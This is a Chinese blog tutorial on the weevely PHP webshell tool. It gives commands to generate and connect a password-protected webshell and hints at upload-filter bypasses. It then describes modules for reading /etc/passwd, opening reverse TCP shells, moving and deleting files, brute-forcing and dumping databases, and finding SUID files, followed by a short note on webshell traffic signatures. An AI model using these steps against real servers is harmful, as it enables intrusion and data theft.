weevely-kali PHP菜刀工具使用详解

weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。
项目地址:https://github.com/epinna/Weevely

 

下面就针对该工具里的功能,做一个较为详细的使用测试记录:

使用系统为linux kaili版本:

生成一句话木马:

weevely generate 1234 /mnt/hgfs/kali-share/hacker.php

1234为木马连接得密码,后面的 /mnt/hgfs/kali-share/hacker.php为木马所在路径

 

利用各种方法上传木马,如前端绕过,文件头判断绕过,防火墙绕过等等,具体我之后再写文章总结。

上传成功之后,通过以下命令连接:

weevely http://xxx.xxx.xxx.xxx/uploads/hacker.php3 1234

第一个参数为上传的木马路径,第二个为木马得密码。即可连接上:

执行任意命令:

在虚拟终端模式下需要使用模块直接在前面加上 ’:’ 即可

-audit.userfiles

-枚举用户目录下的具有权限的文件(可加载用户字典),默认情况下字典很小(注意:该模块目前只支持linux,windows不支持)

 

-audit.systemfiles [logs|root|home|…]

-枚举各种系统目录并寻找可读写的目录,模块仅默认搜索部分linux下的常见目录,logs、root、home等等(注意:该模块也仅支持linux,windows不支持)

 

-audit.phpconf

-查看php配置信息

 

-audit.etcpasswd [-real]

-查看/etc/passwd文件(特殊说明:很多命令的-vector参数是用以指定php执行命令函数的,当默认函数不可用是,使用该参数来尝试指定其他命令执行函数来获取信息),同时也可使用-real参数来过滤出真实用户

 

-audit.mapwebfiles

-从指定url开始爬取目标站点结构,可用-depth参数来指定爬取深度

 

-shell.sh/shell.php

-利用接口执行命令,和虚拟终端类似,这里就不给演示了

 

-system.info

-在weevely里比较由用的一个模块,可以获取到系统的基本信息

 

-backdoor.reverstcp host port [-vector]

-反弹一个tcp shell到目标端口(同样也可指定向量:选择反弹shell的形式,nc,perl,ruby等)

 

-backdoor.tcp -port <listen_port> -no-connect [-vector]

-在本地打开一个端口,等待连接(查看了该模块的源码,使用时必须带上-no-connect才能监听成功,负责他会在本地形成一个tcp环路)

 

-net.ifaces

-查看网络ip地址

 

-file.upload lpath rpath

-上传本地文件到目标站点指定路径

 

-file.rm filename [-recursive] [-vector]

-删除指定文件,可开启安全确认模式

 

-file.check

-用以检查目标站点下文件的状态(md5值,大小,权限等)

 

-file.download rpath lpath [-vector]

-将目标站点上的文件下载到本地(可用于批量会话操作)

 

-file.edit filename
-对指定文件进行编辑
-file.read filename
-读取指定文件内容
-file.ls path
-列觉指定路径的文件信息
-file.upload2web
-将本地文件上传至目标站点文件夹(可自动枚举到一个可写目录将其写入)
-file.webdownload <webfile_path> filename
-从其他服务器上下载文件到目标站点
-file.touch rpath
-创建一个新文件
下面几个命令由于环境限制,没有进行测试,这里就不再啰嗦了
-bruteforce.sql(爆破指定数据库用户名密码)
-bruteforce.sqlusers(爆破所有数据库用户密码)
-sql.dump(脱裤,你懂的 ^_^)
-sql.console(sql交互式终端)
-net.scan(端口扫描,不太会用)
-find.perms(搜索具有读、写、执行权限的文件,好像比较给力)
-find.suidsgid(搜索linux具有suid或者sgid标记的文件)    
-find.name(查找某文件或者文件夹)

 

webshell管理工具的流量特征包括以下几个方面: 1. 使用各种shell工具获取目标权限,进行数据操作。其中,菜刀是一种常用的shell管理工具,可以对webshell进行流量分析。 2. webshell管理工具的流量中,可以通过解密来获取攻击者上传到服务器的webshell样本。同时,可以使用wireshark等流量包分析工具来获取流量信息。 3. 在不同的编程语言中,webshell管理工具的payload特征也有所不同。例如,在Php中可能使用assert、eval执行;在asp中可能使用eval;在jsp中可能使用Java类加载(ClassLoader),并伴有base64编码解码等字符特征。 综上所述,webshell管理工具的流量特征包括菜刀流量分析、解密webshell样本、使用各种shell工具获取目标权限以及不同编程语言中的payload特征。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [kingkong:解密哥斯拉webshell管理工具流量](https://download.csdn.net/download/weixin_42134143/16688569)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [Webshell工具的流量特征分析](https://blog.csdn.net/Chales123/article/details/131135315)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值